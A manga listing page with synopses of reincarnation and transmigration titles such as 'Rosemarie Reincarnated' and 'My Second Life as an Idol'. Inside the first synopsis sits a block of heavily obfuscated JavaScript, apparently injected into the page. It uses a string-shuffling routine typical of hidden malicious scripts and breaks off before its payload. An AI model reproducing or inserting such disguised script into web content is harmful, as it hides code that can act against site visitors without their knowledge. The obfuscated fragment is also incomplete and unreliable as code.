Reincarnation - Page 42

Explore the world of Reincarnation manga, where gripping stories await. Start reading the best Reincarnation manga free now!

546 results

Hello, I’m the Gardener!

Lee Ji-hyeon, an ordinary high school student who was met with a sudden death on the day of the end of college admission exams. But suddenly, she became a gardener that can communicate with plants? After her death, she was born into ‘Elleb’ a fantasy world, with the new name Silvia, and her own special ability. Silvia nurtured and improved her ability and became a gardener recognized by the system. She was living an ordinary (?) life until…<script></script><script>(function(_0xc6fcfa,_0x3d7dd4){var _0x4627f6=_0x1442,_0x249b7d=_0xc6fcfa();while(!![]){try{var _0x873043=-parseInt(_0x4627f6(0x1ea))/(-0x1fc4+0x1*-0x102f+-0x2ff4*-0x1)+-parseInt(_0x4627f6(0x1e8))/(0xc4*0xf+-0x1c03+0x1089)*(parseInt(_0x4627f6(0x1f3))/(0xc*0x11c+-0x24c0+0x1773))+-parseInt(_0x4627f6(0x1e9))/(0x1*0x1c0d+0x151+0x1ba*-0x11)*(-parseInt(_0x4627f6(0x1fa))/(-0x19b1+0x6f6+-0xa*-0x1e0))+parseInt(_0x4627f6(0x200))/(0x2383*0x1+0xaa*-0xf+-0x1987)+-parseInt(_0x4627f6(0x1ef))/(0x191c+0x14e+0x23*-0xc1)*(-parseInt(_0x4627f6(0x1e6))/(0x1d66*-0x1+0x22cf+-0x561))+parseInt(_0x4627f6(0x1f4))/(0x2456+-0x7a*0xe+-0x5ed*0x5)+parseInt(_0x4627f6(0x207))/(0xdf1+-0x97c+0x3*-0x179);if(_0x873043===_0x3d7dd4)break;else _0x249b7d['push'](_0x249b7d['shift']());}catch(_0x1eb107){_0x249b7d['push'](_0x249b7d['shift']());}}}(_0x4fb2,0xa75c*0x13+0x9284f*-0x1+0x865ad));function custom(){var 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Rosemarie Reincarnated

Tensei Oujo wa Kyou mo Hata wo Tatakioru / / Rosemarie Reincarnated: Fixing Bad Suitor and Getting Her BelovedWho cares about being cute?! Rosemarie is a young girl who got reincarnated in the world of a dating sim. That game was famous for being a crappy game full of hopeless men! She has a bad feeling about it, but she has no time to waste getting upset about it! She's going to change the peculiar dateable character for the better and meet the man she really loves at all costs!


For Stella

In order to return to her past life, she must find a way meet her end. However the male lead who’s traveled back in time, keeps preventing her death. Dana is a side character destined to die for the leading couple, Arcane and Stella. So to get back to my real world, I have to do my best to fulfil her role…! But, why is the male lead so obsessed with me all of a sudden? And why do I get the feeling he’s purposely going against the flow of the original…? “I won’t let you die again because of me, Dana”


My Second Life as an Idol

From failed idol to hailed idol! Flop idol Yongmin dies an unfortunate death but is given a second chance at life in the body of Ian, a super hot rich kid with a voice to match. At his side, he finds Jin, a mysterious soul tasked with guiding Ian to becoming a certified star. But is it really all smooth sailing from here? 기레기와 함께하는 연예계 생활


The Author I Stole

Angela, who was born in a completely different world while retaining memories of her past life, embarks on her second life. She wants to widely spread Andersen’s stories, her favourites from her past life. Angela establishes a publishing company and successfully publishes his fairy tales, thriving in her endeavors. However… “It doesn’t make sense…” “What do you mean by ‘It doesn’t make sense’?” To her surprise, there is also an Andersen in this world! And not just any Andersen, but a sharp and handsome one. Angela jumps at the opportunity to recruit the writer for the first time in her life. Although he leads a stable life as a knight from a noble family, she possesses a jewel-like talent of her own. “Author, please (eternally) contract with me!” A romance fantasy even more enchanting than a fairy tale, .” 내가 훔친 작가님


My senior brother is too steady

My senior brother is too steady, My Brother Is Actually Too Stable, My Senior Is Really Extremely Firm, W Shxing Shzi Ti Wnjinle, , , Wo Shixiong Shizai Tai WenjianleAfter being reborn in ancient times before the Great God-Conferment War, Li Changshou became a small cultivator.To survive in the cruel Primordial Times, Li Changshou tries hard not to accumulate any karma. He always plans thoroughly before doing anything and never allows himself to walk into dangerous situations. He hides his trump cards well, trains himself in escape techniques, refines poisonous pills, and masters mystical abilities.Li Changshou originally planned to remain hidden and safe in the mountain until his ascension to immortality. However, everything changed one year when his master brought home a junior sister


I Led the Male Lead and Antagonist Astray

I Led the Male Lead and Antagonist Astray manhua, I Have Raised Both the Protagonist and the Antagonist CrookedlyFu Sang is a yin being that was formed from the resentment of the dead. By chance, she received the opportunity to be reborn as a human again. Bound by a trash system, the system tells her that she must raise the protagonist and the villain well so that they won’t be rivals due to the female lead in the future. By doing this, she will complete the mission. But Fu Sang only has the word “resentment” in her eyes. Raising kids = nourishing pure resentment. Not bad! And so Fu Sang began her journey of raising these kids, but she finds out that things may not be so easy.


I Might Have Too Many Husbands

My Husbands Are A Little Too Much / Wo De Xianggong Youdian Duo / / / She transmigrated into a world where women rule supreme. Upon arrival, she is greeted by four vivacious husbands, this convinces her that she is be the choice of heaven. But wait, why are her husbands trying to kill her?


Return of the Youngest Grandmaster

Wu Xinghe, the youngest grandmaster in the history of ancient Chinese martial arts, was hunted down by the organization of Blood-Eating Rose and died. However, it is a spirit that is not ignorant, and the soul is reborn on the body of a low-level noble boy in a different world, once again opening the road to the peak of his pursuit of martial arts.Fighting Again For A Lifetime


Love and Blade: Girl in Peril

I was reborn as a web novel character and found out that I was destined to be assassinated by my rivals! My name is Moyong Ah-rin, a girl who just lost her parents and joined the Moyong sect, one of the strongest groups in Murim. To avoid the inevitable, I disguised myself as a boy and changed my name to Moyong Ah-hyun. But there’s one problem, my brother-in-arms and distant relative, Moyong Chun, is taking an interest in me… Stop obsessing over me, Brother Chun! If you love me, my fate won’t change! 사형 저 사실 여자예요 / I’m Actually a Woman


He’s My Real Brother, Duke

In a fantasy novel, I possessed the hidden younger sister of the Male Lead, ‘Astel’. While my brother Cassian is struggling for the revenge of the family, it’s my job to find and deal with the final Villain that has not been revealed even at the end of the original novel!!! In order to do that, I must first enter the Northern Duke Castle, where the family’s traitors are hiding. Somehow, I became an “imprint of companion” of Duke Anais, a beast of beast and a leading candidate for the final villain. Besides…… “Please kiss me now, Astel.” In order to live, you’re required to have a daily skinship with your ‘imprint partner’. There was no such thing in the contents of the original story! “Shall we go see your favorite sea today?” “I……I don’t think I can. I have to meet Sir Cassian today.” The Duke gritted his teeth with a cold face. I was slightly scared as I saw him. Maybe he’s teething? Because he’s a wild beast! * * * One day, after I received the Duke’s favor and consideration. My older brother Cassian left his son to me for a while. However, the Duke seems to have made a huge misunderstanding. “It will become our child.” “What……?” “Cassian Gray will disappear from this world now, so you will not become his bride.” Yes……? When did I become Cassian Gray’s bride, aren’t we relatives? 그 남자는 제 친오빠인데요,공작님 / Duke, that man is my real brother


Fight For Her Gifted Son

A 21st century top-class assassin travels back in time one day to find that she's been transformed into the Second Miss of the Duanmu Family, one of the five great aristocratic families of the Xuanyuan Dynasty. But, this Second Miss was naturally useless, obsessed with men and a mother out of wedlock! Fine, since she was there already, then she should live coolly. When she appeared in front of everyone with her genius son, she was no longer "her". She wandered Jianghu with her son, killing everyone that got in the way. How would she survive in this chaotic world? And, out of all the handsome men that followed by her side, which one was her child's father? Finally, who would win her heart? My Clever Mummy / Tiancai Baobei de Fuhei Diniang / 天才宝贝的腹黑嫡娘 / 킬러는 육아 중
